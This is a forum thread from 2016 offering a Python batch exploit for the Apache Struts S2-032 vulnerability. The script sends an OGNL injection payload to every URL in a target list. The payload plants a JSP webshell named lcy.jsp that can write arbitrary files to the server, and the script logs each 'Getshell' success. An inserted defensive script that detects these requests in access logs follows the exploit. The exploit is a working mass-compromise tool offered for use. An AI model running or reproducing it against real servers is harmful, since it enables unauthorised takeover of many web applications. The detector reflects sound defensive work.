
[Tools] S2-032 batch getshell, writes a small webshell to the web root


    Posted on 2016-4-26 20:44:38
    Struts S2-032

    [Python]
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # @Author: Lcy
    # @Date:   2016-04-26 17:38:52
    # @Last Modified by:   Lcy
    # @Last Modified time: 2016-04-26 18:20:45
    import requests
    import sys
    if len(sys.argv) < 2:
        print "Example: python exp.py list.txt"
        exit()
    weblist = sys.argv[1]
    payload = "?method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=lcy.jsp&content=%3C%25@%20page%20language%3D%22java%22%20pageEncoding%3D%22gbk%22%25%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.File%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.OutputStream%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.FileOutputStream%22%2f%3E%3C%25%20int%20i%3D0%3BString%20method%3Drequest.getParameter%28%22act%22%29%3Bif%28method%21%3Dnull%26%26method.equals%28%22yoco%22%29%29%7BString%20url%3Drequest.getParameter%28%22url%22%29%3BString%20text%3Drequest.getParameter%28%22smart%22%29%3BFile%20f%3Dnew%20File%28url%29%3Bif%28f.exists%28%29%29%7Bf.delete%28%29%3B%7Dtry%7BOutputStream%20o%3Dnew%20FileOutputStream%28f%29%3Bo.write%28text.getBytes%28%29%29%3Bo.close%28%29%3B%7Dcatch%28Exception%20e%29%7Bi%2b%2b%3B%25%3E0%3C%25%7D%7Dif%28i%3D%3D0%29%7B%25%3E1%3C%25%7D%25%3E%3Cform%20action%3D%27%3Fact%3Dyoco%27%20method%3D%27post%27%3E%3Cinput%20size%3D%22100%22%20value%3D%22%3C%25%3Dapplication.getRealPath%28%22%2f%22%29%20%25%3E%22%20name%3D%22url%22%3E%3Cbr%3E%3Ctextarea%20rows%3D%2220%22%20cols%3D%2280%22%20name%3D%22smart%22%3E"
    f = open(weblist)
    for l in f.readlines():
        url = l.strip()  + payload
        try:
            r = requests.get(url,timeout=5)
            res = r.text
            if "lcy.jsp" in res:
                f = open("result.txt","a")
                f.write(l.strip()  + payload + "\r\n\r\n")
                print "\n %s Getshell Success!" % l.strip(),
        except:
            pass
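A defensive counterpart to the script above, as an added example that is not part of the original post: it scans web access logs for requests that carry OGNL syntax in a Struts `method:` parameter name, and for hits on the `lcy.jsp` file the script writes. The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Indicators taken from the script in the post above.
OGNL_MARKERS = ("#_memberAccess", "@ognl.", "#context", "#parameters", "java.io.")
DROPPED_FILE = "lcy.jsp"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode_fully(text, rounds=3):
    """Undo repeated percent-encoding so %2523 and %23 both end up as '#'."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(log_line):
    """Return a rule name for one access-log line, or None if nothing matched."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    hit_file = decode_fully(path).lower().endswith("/" + DROPPED_FILE)
    verdict = "dropped-file-access" if hit_file else None
    # Split on the raw '&' first: decoding first could create new separators.
    for pair in query.split("&"):
        name = decode_fully(pair.partition("=")[0])
        if not name.lower().startswith("method:"):
            continue
        if any(marker in name for marker in OGNL_MARKERS):
            return "ognl-in-method-prefix"
        # A bare method: prefix is also used legitimately; queue it for review.
        verdict = verdict or "method-prefix-review"
    return verdict

def scan(lines):
    """Return (line_number, rule_name) for every line that matched a rule."""
    results = [(number, classify(line)) for number, line in enumerate(lines, 1)]
    return [(number, verdict) for number, verdict in results if verdict]

# Constructed sample lines (not real traffic); the OGNL fragments are cut short.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Apr/2016:18:21:03 +0800] "GET /index.action?method:%23_memberAccess%3d%40ognl.OgnlContext HTTP/1.1" 200 31',
    '203.0.113.9 - - [26/Apr/2016:18:22:10 +0800] "GET /order.action?method:save&id=7 HTTP/1.1" 200 512',
    '198.51.100.7 - - [26/Apr/2016:18:23:44 +0800] "GET /a.action?x=1&method:%2523_memberAccess%253d1 HTTP/1.1" 404 0',
    '198.51.100.7 - - [26/Apr/2016:18:24:02 +0800] "POST /lcy.jsp?act=yoco HTTP/1.1" 200 1',
    '203.0.113.9 - - [26/Apr/2016:18:25:30 +0800] "GET /index.action?page=2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```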

    Posted on 2016-4-27 08:59:35
    I can't believe I got the first reply, nobody has commented